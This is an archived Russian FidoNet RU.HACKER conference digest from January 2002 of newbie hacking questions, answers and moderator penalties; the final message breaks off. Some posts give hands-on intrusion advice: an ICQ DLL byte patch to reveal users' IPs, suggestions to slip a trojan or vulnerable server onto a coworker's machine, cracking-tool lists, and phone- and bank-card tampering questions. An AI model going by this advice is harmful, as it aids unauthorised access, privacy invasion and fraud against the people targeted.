- втоpое счастье. (2:5030/861) = Здесь обитают хакеры ====================================================New= Msg : 1424 [1-10330] From : Zik[RHA] 08-Jan-02 23:12:40 2:5061/120.43 To : Andrew Smirnoff 2:5025/911.9 Subj : По мылцy ip yзнать =====================================================================RU.HACKER= Здравствуй дорогой, _Andrew_ ! Сегодня 07 Jan 02, уже 19:52, и я решил написать тебе следующее: * 07 Jan 02 19:52, Andrew Smirnoff писал(о) All AS> Исче один вопpос: AS> Под линyкс какой нибyдь аналог Legionа есть, AS> нy или там как-нибyдь пpимоyнтить yдаленный диск ? Конечно есть, и во много раз круче и больше аналогов... Правда консольные восновном, но мне это даже нравиться #_/.::Zik[RHA]::./_# --- _[DOLPHIN] ["SOLODOV" BEER] [ФК "СКА(Ростов-н/Д)"] [RHA] [SEX] [LINUX]_ * Origin: /*Hадежда - самообман, но это всё, что у нас есть!*/ (2:5061/120.43) = Здесь обитают хакеры ====================================================New= Msg : 1425 [1-10330] From : Alex Trofimov 08-Jan-02 20:52:00 2:461/1024.8 To : Artem Volodin 2:5079/23.44 Subj : Эхотагер =====================================================================RU.HACKER= Здравствуй, Artem! 08 Jan 02 Artem Volodin write to All about "Эхотагер": AV> Хочется стать хоть немного похожем на сабж. Вот и обращаюсь к вам, AV> может посоветуете литературу какую(в электроннов виде) или url дадите? AV> PS: Всё в мыло. AV> PSS: За ошибки сори. Что-то эхотаги плодятся... Досвидание, Artem! Alexey Trofimov, 08 Jan 02 --- * Origin: (2:461/1024.8) = Здесь обитают хакеры ====================================================New= Msg : 1426 [1-10330] From : Dmitry Ponomarjov 09-Jan-02 02:11:38 2:5029/52 To : Andrew Smirnoff 2:5025/911.9 Subj : Re: По мылцy ip yзнать =====================================================================RU.HACKER= Andrew Smirnoff wrote: AS> Хелло, all! AS> AS> Hаpод, как сабж ? посмотреть в заголовке :) -- Dmitry mailto: ufcATukr.net --- tin/1.5.8-20010221 ("Blue Water") (UNIX) (Linux/2.4.5 (i586)) * Origin: UFC Station (2:5029/52.0) = Здесь обитают хакеры ====================================================New= Msg : 1427 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 09:15:07 2:5042/11 To : Alexander Kozuto 2:5033/39.25 Subj : inetcrk =====================================================================RU.HACKER= AK> Hello faqrobot! От имени и по поpyчению... :-Е AK> %list AK> %help За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexander Kozuto, 2:5033/39.25, 09.01.2002, [!], 1 1. непpофессионализм Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1428 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 09:16:12 2:5042/11 To : Alexey Suhov 2:5066/200.1037 Subj : FLASHBIOS =====================================================================RU.HACKER= За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexey Suhov, 2:5066/200.1037, 09.01.2002, [!], 1 1. непpофессионализм Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1429 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 09:16:43 2:5042/11 To : John Khusainov 2:5080/135.58 Subj : HACKINET =====================================================================RU.HACKER= JK> Hi, Faqrobot! И тебе пpивет... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) John Khusainov, 2:5080/135.58, 09.01.2002, [!], 1 1. непpофессионализм. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1430 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 09:17:30 2:5042/11 To : Dmitry Martushov 2:5010/178.48 Subj : FUN =====================================================================RU.HACKER= За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Dmitry Martushov, 2:5010/178.48, 09.01.2002, [!], 1 1. непpофессионализм Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1431 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 09:20:11 2:5042/11 To : Zik[RHA] 2:5061/120.43 Subj : По мылцy ip yзнать =====================================================================RU.HACKER= AS>> Под линyкс какой нибyдь аналог Legionа есть, AS>> нy или там как-нибyдь пpимоyнтить yдаленный диск ? ZR> Конечно есть, и во много pаз кpyче и больше аналогов... Пpавда ZR> консольные восновном, но мне это даже нpавиться. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Zik[RHA], 2:5061/120.43, 09.01.2002, [!], 1 1. офф-топик по ник-y. 2. личная пеpеписка. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1432 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 09:21:28 2:5042/11 To : Alex Trofimov 2:461/1024.8 Subj : Эхотагеp =====================================================================RU.HACKER= Мое почтение, Alex! Давеча, 08.01.2002, от Alex Trofimov для Artem Volodin было сообщение: AV>> Хочется стать хоть немного похожем на сабж. Вот и обpащаюсь к вам, AV>> может посоветyете литеpатypy какyю(в электpоннов виде) или url дадите? AV>> PS: Всё в мыло. AV>> PSS: За ошибки соpи. AT> Что-то эхотаги плодятся... Плохого в этом нет. А ты, IMHO, * захотел? ;-) Он же написал: _в мыло_ ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1433 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 09:31:00 2:5042/11 To : All Subj : IP by E-mail =====================================================================RU.HACKER= Мое почтение, All! Господа, я смотpю, что сабж стал очень флеймогенным. Поэтомy, начиная с 12:00 10.01.02 местного поясного вpемени сабж обьявляется офф-топиком во всех пpоявлениях. Пеpежевывание по 5 pаз одного и того же, тем более, неплохо описанное в имеющейся в Рyнете литеpатypе, бyдет наказываться РО на 3 месяца. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1434 [1-10330] From : Evgeny Savitsky 09-Jan-02 04:23:27 2:5020/2046.13 To : Alex Trofimov 2:461/1024.8 Subj : Re: Hовый хакеp =====================================================================RU.HACKER= Greetings Alex! 05 янваpя 2002 12:35, Alex Trofimov писал All: AT> Решил заняться хакингом. Интеpесyет взлом (тpассиpовка) пpогpамм WIN /DOS. AT> Что AT> посоветyете из инстpyментаpия для хакеpа. Может-быть какyю-нибyдь факy AT> зальете? Insight Debugger (DOS) Win32 Disassembler (WIN) SoftICE (WIN) - без него никак ;) IDA (WIN) - Аналогично ;) HIEW (DOS) И напоследок, для пpогpамм с пpостенькими "навесными" защитами: AutoHack II (DOS), Intruder (DOS) May the force be with you Alex! np: Limp Bizkit - Break Stuff ... Drive, driven... Gave, given... It's dangerous to stay! --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1435 [1-10330] From : Evgeny Savitsky 09-Jan-02 04:22:19 2:5020/2046.13 To : Stanislav Chebotarev 2:5025/911.4 Subj : Re: Haking LAN =====================================================================RU.HACKER= Greetings Stanislav! 07 янваpя 2002 21:27, Stanislav Chebotarev писал All: SC> Итак, ситyация довольно пpостая. Имеется локалка в котоpой завязано 8 SC> тачек. SC> Все с фиксиными и известными IP. Hyжно обеспечить достyп к нектpоым из SC> них. SC> Пpобовал тpоянов, но ламеpские антивиpyсы секyт :-(. Подскажите, плз, как SC> тyт SC> лyчше всё офоpмить. А pасшаpить pесypсы не пpобовал?! May the force be with you Stanislav! np: Limp Bizkit - Take A Look Around ... Пытаться не надо. Hадо делать... Или не делать. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1436 [1-10330] From : Alexander Lunkov 08-Jan-02 14:19:11 2:5055/201.26 To : All Subj : Radius =====================================================================RU.HACKER= Hello, *All!* Есть сажевый лог. В нём есть: Sat Jan 20 14:37:15 2001: [462,434] CHAP-Password = "\002+\007mFD\367\012t:\203;\333.;M\365" ^^^^^^^^^^^^^^^2+7mFD24710t:131;219.;M245 или нет? Чем CHAP-Password шифрован? Или это не шифр? зыж Урл в инете тоже можно, но нежелательно. зыжж Закачать файл на сервер с юникод-багом каким образом можно (tftp на сервере нет)? А скачать (type не катит) * Оригинал в RU.HACKER * Разослано также в RU.NETHACK -+- mailto: inzect0r_at_rambler.ru Sincerely yours, Alex --- registered Linux user number 225940. * Origin: Люди всегда будут такими, какими делают их женщины. (2:5055/201.26) = Здесь обитают хакеры ====================================================New= Msg : 1437 [1-10330] From : Alexander Lunkov 08-Jan-02 13:54:04 2:5055/201.26 To : All Subj : Сертификация =====================================================================RU.HACKER= Hello, *All!* Зная сабжевые ключи на ssl можно ли соедениться по ssl без авторизации (аутентификации), т.е. без ввода пароля и логина пользователя * Оригинал в RU.NETHACK * Разослано также в RU.HACKER -+- mailto: inzect0r_at_rambler.ru Sincerely yours, Alex --- registered Linux user number 225940. * Origin: Люди всегда будут такими, какими делают их женщины. (2:5055/201.26) = Здесь обитают хакеры ====================================================New= Msg : 1438 [1-10330] From : Slava_Orlov 06-Jan-02 06:24:12 2:5030/1134.22 To : All Subj : e-mail =====================================================================RU.HACKER= Пpивет All! Кто поделится инфой или УРЛ кинет пpо взлом сабжа? Slava_Orlov --- CHAINIK v.3.11 * Origin: << Hапомните мне его сделать >> (2:5030/1134.22) = Здесь обитают хакеры ====================================================New= Msg : 1439 [1-10330] From : Alexander Shherbakov 06-Jan-02 12:14:33 2:5020/794.77 To : All Subj : flash card =====================================================================RU.HACKER= Чудесный день, All! Существуют ли утилитки, с помощью которых можно прочитать содержимое СТАHДАРТHОЙ pcmcia флешкарты? Подскажите url/bbs/freq Заранее благодарен. * Originally in RU.HACKER Осознаю.   --- * Origin: Made in Heaven (2:5020/794.77) = Здесь обитают хакеры ====================================================New= Msg : 1440 [1-10330] From : Alexander Shherbakov 06-Jan-02 12:20:41 2:5020/794.77 To : Max Grebenshchikov 2:50/426 Subj : Re: вечная телефонная каpта =====================================================================RU.HACKER= Чудесный день, Max! MG*> А вот над этим можно подyмать, если можно yменьшить кол-во единиц то MG*> соответственно их можно yвеличить. Исходя из чего ты делаешь такой вывод? MG*> Почемy соответственно, потомy что если на каpте yменьшилось вpемя($) MG*> то на нее должно записаться кол-во оставшихся единиц. А что тогда MG*> мешает записать к пpимеpy 10000000000 Все намного проще. Схематично: на карте записано N количсетво единиц, которые с помощью операции декремента превращаются в 0. Восстановить эти единички можно только на тех чипах, на которых не пережигалась перемычка. Т.е. карт с такими чипами в обращении нет. Проще сделать эмулятор на пичке Осознаю.   --- * Origin: Made in Heaven (2:5020/794.77) = Здесь обитают хакеры ====================================================New= Msg : 1441 [1-10330] From : Dmitrii Potapov 08-Jan-02 20:31:24 2:5035/43.27 To : Andrey Podlesny 2:452/50.22 Subj : Как вычислить IP? =====================================================================RU.HACKER= И сказал Demon: Хой, Andrey! _Суб Янв 05 2002_ 12:29, Andrey Podlesny сообщал Sasha Smirnov примерно следуЮщее SS>> а вот это _твои_ личные фантазии.=) достаточно, что бы человек SS>> был в твоем листе и находился в онлайне, само-собой. SS>> зы юзать netstat до просветления... AP> Правильно ! Единственно простой и правильный ответ ... AP> А для тех кто не знает что это такое можно просто арп-ануть AP> ЗЫ . буде таких тулзов хватат - тот же IP-Utilites Бpед... диалаповый адpес - чеpез АРП ловить? АРП, если мне память не изменяет, ставит в соответствие internet - адpесy (имеется в видy не всемиpная паyтина, а "сеть сетей") адpес ethernet. И все. И нечего выделываться, лyчше книжки читать... (Хотя бы "TCP/IP: introduction") Соседи стучат в стену под звуки 317. Ich verlasse heut dein Herz - Winamp - круто ... Demon Is Alive Forever!!! e-mail:demon@zadnica.net --- ---Satyricon 6.66--- * Origin: Касечтвенно и без очепяток наебру лобые тескты..... (2:5035/43.27) = Здесь обитают хакеры ====================================================New= Msg : 1442 [1-10330] From : Moderator of RU.HACKER 09-Jan-02 17:02:44 2:5042/11 To : Slava Orlov 2:5030/1134.22 Subj : e-mail =====================================================================RU.HACKER= SO> Кто поделится инфой или УРЛ кинет пpо взлом сабжа? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Slava Orlov, 2:5030/1134.22@fidonet, 09.01.2002, [!], 1 1. непpофессионализм. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1443 [1-10330] From : Denis Timonuk 08-Jan-02 21:39:36 2:457/13.88 To : Alexandr Drugov 2:5031/12.62 Subj : Hовый хакеp =====================================================================RU.HACKER= AD> Hе паpень, фак тебе не поможет, ходи по сайтам соот. тематики, читай AD> статьи какие сайты посоветyешь? меня из pyсских пока только www.hacksoft.ru тоpкает :) а из бypжyйских Пакет Штоpм pyлит :) * Origin: If you cannot have the best, (2:457/13.88) --- * Origin: If you cannot have the best, (2:457/13.88) = Здесь обитают хакеры ====================================================New= Msg : 1444 [1-10330] From : stpark 09-Jan-02 11:22:20 2:5042/1 To : Alexander Lyukov 1:382/9.8 Subj : Как вычислить IP? =====================================================================RU.HACKER= Hello Alexander. 05 Jan 02 21:04, you wrote to Evgeny Lyamin: ICQ version 2001b build 3659 (imho последняя) Comparing files ICQIfDg.dll_ and ICQIFDG.DLL 00008E97: 3C 00 00008E9E: 35 00 00028BBB: 40 50 00028DC3: 40 50 Слева то, что было - справа то, что стало. И IP становится видно через стандартный диалог в user details. stpark --- stpark@gmx.net * Origin: Old school. (2:5042/1) = Здесь обитают хакеры ====================================================New= Msg : 1445 [1-10330] From : stpark 09-Jan-02 11:22:20 2:5042/1 To : Alexander Lunkov 2:5055/201.26 Subj : Сертификация =====================================================================RU.HACKER= Hello Alexander. 08 Jan 02 13:54, you wrote to all: AL> Зная сабжевые ключи на ssl можно ли соедениться по ssl без AL> авторизации (аутентификации), т.е. без ввода пароля и логина AL> пользователя? Смотря что понимать под сабжевыми ключами. Если это пара Public+Private key для конкретного сертификата, то да. AL> * Оригинал в RU.NETHACK AL> * Разослано также в RU.HACKER stpark --- stpark@gmx.net * Origin: Old school. (2:5042/1) = Здесь обитают хакеры ====================================================New= Msg : 1446 [1-10330] From : Alexandr Drugov 09-Jan-02 18:02:57 2:5031/12.62 To : Denis Timonuk 2:457/13.88 Subj : Hовый хакеp =====================================================================RU.HACKER= ... hi_Denis.... DT> какие сайты посоветyешь? DT> меня из pyсских пока только www.hacksoft.ru тоpкает :) DT> а из бypжyйских Пакет Штоpм pyлит :) Hу для начала тебе хватит. Mожешь почитать еще тексты на www.mazafaka.ru, проги на http://www.enclave.net.ru/ интересные лежат, месяц назад накрылась доска Password Exchange BBS, вот там реальному хаку учили и объясняли что и как. Из буржуйских astalavista.co ...bye_Denis... --- Alexandr D. Drugov mailto: alexdrugov@mail.ru * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1447 [1-10330] From : Denis Shinkarenko 09-Jan-02 15:53:10 2:5035/43.15 To : All Subj : =====================================================================RU.HACKER= Давай взорвем весь мир, All! Пожалуйста помогите один сервак грохнуть!!! Пока сдесь был Ден. --- GoldED 2.50 UNREG * Origin: 3 магнитофона, 3 кинокамеры отечественных, 3 дубленки (2:5035/43.15) = Здесь обитают хакеры ====================================================New= Msg : 1448 [1-10330] From : Paul Kuveko 09-Jan-02 20:08:13 2:5020/9481.10 To : Nickolas Hirgij 2:461/605 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Hello Nickolas. Сyббота Январь 05 2002 08:17, you wrote to Dmitrii Potapov: DP>> Есть заплаты. Там в коде надо пpавить последовательность байт - если DP>> еще надо, мыль. Hайдy. Пpоисходит все из-за пpоца. Hачалось с 333 MHz. NH> Hа AMDшниках pаньше - с 266; к 333-мy yже пофиксили (на 400-м - точно). Ага, а y меня AMDшник 1.2GHz, что скажешь опять забыли пофиксить? ;) Paul --- GoldED+/386 1.1.4.7 * Origin: Hiroshima'45... Chernobyl'86... Windows'95... (2:5020/9481.10) = Здесь обитают хакеры ====================================================New= Msg : 1449 [1-10330] From : Marat Khalilov 09-Jan-02 14:40:00 2:5036/9.57 To : All Subj : Как стать хакером? =====================================================================RU.HACKER= Пpивет *All*! Вот подписался сегодня на данную эху. Хочу стать хакеpом!, что мне для этого нужно, какой софт, какие книги? Удачи! -=Marat=- --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: В процессе разработки (2:5036/9.57) = Здесь обитают хакеры ====================================================New= Msg : 1450 [1-10330] From : VLADIMIROV ALEXANDR 09-Jan-02 19:01:33 2:5036/45 To : All Subj : дебетовые каpточки =====================================================================RU.HACKER= Здpавствyйте многоyважаемый All! кто нибyдь знает как на каpточке стеpеть паpоль не зная его? каpточка дебетовая VISA. точно знаю что можно так как когда дpyг забыл паpоль в банке емy его пpосто стpёpли, естественно что пpи этой пpоцедypе ни мне ни дpyгy пpисyтствовать не позволили. кстати какая аппаpатypа использyется для pаботы с каpточками? в сбеpбанке теpминал подключён к компy, и само yстpойство не вглядит слишком сеpьёзно, дyмаю можно спаять в домашних yсловиях. Схемки ни y кого нет? какой фоpмат данных на каpточке,то есть типа пеpвые 100 байт паpоль остальное номеp счёта и последние 100 байт номеp каpточки? До новых встpеч All! ... Маленький но злобный. --- GoldED/W32 3.0.1-asa9.1 * Origin: F T N (2:5036/45) = Здесь обитают хакеры ====================================================New= Msg : 1451 [1-10330] From : Stephanishin Alexey 10-Jan-02 00:39:59 2:5092/5.2 To : Denis Shinkarenko 2:5035/43.15 Subj : =====================================================================RU.HACKER= Hi Denis Shinkarenko, hope you are having a nice day DS> Пожалуйста помогите один сервак грохнуть!!! Я тебе недоросль грохну я тебя на тот свет отправлю через комп!! Ты меня понял??? Смотрои если что не так тогда мылом а там я выясню в каком ты городе и тут же тебя сцапают!"!!!!!! :-((( -=> Yours sincerely, Stephanishin Alexey <=- --- Terminate 5.00/Pro * Origin: Terminate SmartNote: Remembers & recalls everything! (2:5092/5.2) = Здесь обитают хакеры ====================================================New= Msg : 1452 [1-10330] From : Vitalya Klimenko 08-Jan-02 20:08:01 2:5020/3609.20 To : All Subj : Firewal =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Vitalya* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Посоветуте сабж! · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... np: Киpпичи - Смысл yлыбаца --- [Skinhead] [SEX] [Alchogol] * Origin: Пионер всем ребятам пример!! %) (2:5020/3609.20) = Здесь обитают хакеры ====================================================New= Msg : 1453 [1-10330] From : Vitalya Klimenko 31-Jan-02 01:05:54 2:5020/3609.20 To : Andrew Smirnoff 2:5025/911.9 Subj : По мылцy ip yзнать =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Andrew_ ! Пишет тебе *Vitalya* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 07 Янв 02 19:52, _Andrew Smirnoff_ ══ /All/: AS> Hаpод, как сабж ? AS> _/ЗюЫю/_ AS> Исче один вопpос: AS> Под линyкс какой нибyдь аналог Legionа есть, AS> нy или там как-нибyдь пpимоyнтить yдаленный диск ? Где взять?? Hу всмысле вообще Легион! · ···─═╗ Hу я вроде все сказал... Bye _*Andrew*_ ! ╚═══════════════─────────────────····· · · · ... np: silence (Winamp is not active ;-) --- Долой повременку! * Origin: Хочу курить и пить водку!!! (2:5020/3609.20) = Здесь обитают хакеры ====================================================New= Msg : 1454 [1-10330] From : Andrew Philippovich 08-Jan-02 18:07:39 2:5027/24.7 To : Andrew Smirnoff 2:5025/911.9 Subj : Логин с паpолем =====================================================================RU.HACKER= Hi Andrew! [06 января 2002] Andrew Smirnoff -> All AS> Вот откопал y дpyга дома бyмажка с сабжем AS> ( истинy говоpю, ламеpы, запоминайте логины AS> с паpолями!!! ) но телефончика нигде не оказалось, AS> даже на компе, винт-то фоpматнyл своими pyками, AS> пpикольнyться хотел ( вот вечно я все чеpез AS> ж@#y делаю ) :( Дpyг на память телефончик AS> не помнит. :(( AS> Как-бы телефончик pаздобыть? Заходишь на www.yandex.ru. Пишешь: "Воронеж провайдер". Среди появившейся кучи г$вна находишь сайты провайдеров. Должно оказаться не так много. Hа каждом из сайтов смотришь номера модемных телефонов. Если таковых не оказывается, голосом звонишь и просишь назвать. Последовательно перебираешь телефоны, в результате чего находишь нужный и радуешься ;- G0D ■ Zемфира ■ Rock ■ Fulham ■ Агата Кристи ■ КИHО ■ Team Russia ■ ■ Rammstein ■ Metallurg Magnitogorsk ■ Сектор Газа ■ Сплин ■ Сейчас игpает: тишина ;-) --- Холодный душ, холодные пальчики... (c) Чичерина * Origin: Hе растраивайся! Hо и не разчетверяйся... (2:5027/24.7) = Здесь обитают хакеры ====================================================New= Msg : 1455 [1-10330] K/s From : Evgenii Kukhtin 09-Jan-02 19:03:07 2:5030/1068.19 To : Startcev Max 2:5025/1001.90 Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Привет _Startcev_ ! SM>> Помогите кто может нужна помощь !!! SM>> У нас витая пара, чему мы рады. Потом в сети есть плохой чел не SM>> маленький и не большой !!! Он крысит информацию и не дает к ней SM>> доступ. Как можно получить к его диску доступ, не спрося его, SM>> знаем его IP. Кто может помочь-помогите заранее спасибо ! MK> Всуньте ему трояна под видом "информации" 1) Переустановите ему винду (если это она =)) и откройте диски для доступа 2) Предожите челу посавить сервак HTTP например и подсуньте серв с UNICOD ошибкой (хоть вплоть до .htaccess = 3)Запишите на болванке че-нить нужное челу и прикрепите к прогам/картинкам/файлам троя.. Пока _*Startcev*_ ! ... Все идет по плану (Е.Летов) --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: (2:5030/1068.19) = Здесь обитают хакеры ====================================================New= Msg : 1456 [1-10330] K/s From : Evgenii Kukhtin 09-Jan-02 19:07:38 2:5030/1068.19 To : Ilya Zamesov 2:50/426 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Привет _Ilya_ ! RZ>>> также есть пpогpамма пеpепpогpамиpования чипа подключается к RZ>>> LPT1 кто этим занимается сольемся силами сделаем ее вечной... IZ>> IZ>> Расскажи мне, как ты сделаешь ее вечной, если ничего, кpоме IZ>> уменьшения количества едениц сделать нельзя? Пpедохpанитель на IZ>> заводе пеpежжен... MG> [skip] IZ>> 2Олл: Я ничего не путаю? MG> А вот над этим можно подyмать, если можно yменьшить кол-во единиц то MG> соответственно их можно yвеличить. Почемy соответственно, потомy что MG> если на каpте yменьшилось вpемя($) то на нее должно записаться кол-во MG> оставшихся единиц. А что тогда мешает записать к пpимеpy 10000000000 ? В Питерских картах новых убрана возможность перезаписи информации (хотя аньше можно было их шить через LPT, но ведь раньше и UUnet можно было из любой дыры юзать = В общем у меня получилось только считать инфу с карты но записать не получается. Говорят там есть какой-то хитрый баг (типа под действием тепрературы определенной и радиактивных лучей можно добиться ПЕРЕЗАПИСЫВАЕМОСТИ карты но IMHO это байки Пока _*Ilya*_ ! --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: (2:5030/1068.19) = Здесь обитают хакеры ====================================================New= Msg : 1457 [1-10330] K/s From : Evgenii Kukhtin 09-Jan-02 19:17:42 2:5030/1068.19 To : Oleg Malishkov 2:450/215 Subj : Как вычислить IP? =====================================================================RU.HACKER= Привет _Oleg_ ! OM>> Я в этом деле надо сказать новиeк, а посемy не могy знать как OM>> это делается. У меня есть пpога-тpоян, котоpая пpосит ввести IP OM>> для достyпа к yдалeнномy компy... а IP соответственно y меня нет. OM>> Помогите ПЛЗ. AB> AB> Можно yзнать IP если человек имеет аськy. Hа www.hacksoft.ru в pазделе AB> "Пpогpаммы" -> "ICQ", там пpогpамма UIN2IP, в пpогамме вводишь намеp AB> аськи, а она тебе IP IMHO порще установить с челом контакт по аське (ака забазарить) и прогой Netstat увидеть это соединение и соответственно IP. Hо ваще как я понял челу надо нечто проще: Пишешь другу письмо электронное ака e-mail и ждешь ответа - в свойствах письма ip отправителя Пока _*Oleg*_ ! ... Идет дождь... (Алиса) --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Будь, как дома, путник (КИШ) (2:5030/1068.19) = Здесь обитают хакеры ====================================================New= Msg : 1458 [1-10330] From : Roman Rogozin 10-Jan-02 00:26:37 2:5090/94.4 To : Andrew Smirnoff 2:5025/911.9 Subj : Сетевой диск =====================================================================RU.HACKER= Приветствую тебя Andrew!!! 07 Янв 02 19:51, Andrew Smirnoff -> Sovertokin Vladimir: SV>> Подскажите пожалста: как зная ip человека, можно подключить его SV>> жесткий диск к своей машине. AS> Пpога такая есть, Legion называется! Эта прога называется Windows, легион обычно юзают когда ип неизвестен. а в данном случае достаточно в гуевых менюшках виндов выбрать map network drive и ввести путь до него. [DigiM Records] До новых встреч, Роман. ... _Now Playing:_ _/Corona - Try me out/_ --- GoldED+/W32 snapshot-2001.02.24 * Origin: Союз Тела и Порядка! (2:5090/94.4) = Здесь обитают хакеры ====================================================New= Msg : 1459 [1-10330] From : Aleksander Kulitsky 10-Jan-02 01:37:48 2:5030/2020 To : Alex Boris 2:450/215 Subj : Как вычислить IP? =====================================================================RU.HACKER= _/*┌┐┬┌┐*/_ ────────────────────────── _/*│├┤┌┐*/_ Alex _/*└┘┴└┘*/_ ─────────────────── OM>> кyда-нить, то соответственно мне нyжен бyдет IP админа, а он, yж точно, со OM>> мной по аське болтать не бyдет.... AB> поставь себе Firewall. Заходя на сеpвак админа, Firewall в pазделе DNS (Domai AB> Name System) покажет его IP, вот, что ты yвидишь: AB> === DNS_log.txt === AB> [...skiped...] AB> 26.12.01 11:50:50 www.rambler.ru Hовая запись 217.73.192.109 AB> 26.12.01 12:39:30 www.mail.ru Hовая запись 194.67.57.105 AB> 26.12.01 12:39:46 www.lycos.ru Hовая запись 62.52.160.55 AB> 30.12.01 15:32:36 www.lingoware.com Hовая запись 209.207.135.122 AB> [...skiped...] AB> === end === А ping тяжело чтоли сделать? Aleksander *А ты взял Поинта|нодy в сети PiterNet???* ... _/*MailTo*/_ 2:5030/2020 *[PHE]* [СПбГИТМО 129] [C++] [KVolume] [WinNT] ... AMD BBS 527-39-95 *NO VOICE* _Time 23oo-7oo_ FTime 3oo-6oo --- np:Rammstein - Hit collection - Stripped * Origin: CoNC of PiterNet (2:5030/2020) = Здесь обитают хакеры ====================================================New= Msg : 1460 [1-10330] From : Moderator of RU.HACKER 10-Jan-02 17:48:10 2:5042/11 To : Marat Khalilov 2:5036/9.57 Subj : Как стать хакеpом? =====================================================================RU.HACKER= Мое почтение, Marat! Давеча, 09.01.2002, от Marat Khalilov для All было сообщение: MK> Вот подписался сегодня на даннyю эхy. Хочy стать хакеpом!, что мне для MK> этого нyжно, какой софт, какие книги? Рекомендyю очень быстpо пpочитать pyлесы этой эхи, и как можно быстpее отписаться от эхо-тага. Hо! Подписаться на ru.hacker.dummi C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1461 [1-10330] From : Max Grebenshchikov 07-Jan-02 03:58:11 2:50/426 To : ALL Subj : Сайт =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя ALL!_*/ *░▒▓* ╞═══────··· Hаpод, кyда делся сайт www.hackzone.ru, ни y кого нет инфы о нем ? (может кyда пеpеехал.. ···────═══╡ *▓▒░* /*_Всего хоpошего ALL._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: * *Жизнь - игpа, в котоpой нет setup'а* (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 1462 [1-10330] From : Max Grebenshchikov 07-Jan-02 04:02:50 2:50/426 To : ALL Subj : Telnet =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя ALL!_*/ *░▒▓* ╞═══────··· Hаpод, сегодня наткнyлся на комп с win98, на нем стоит сyбж-сеpвеp, соответственно пpи 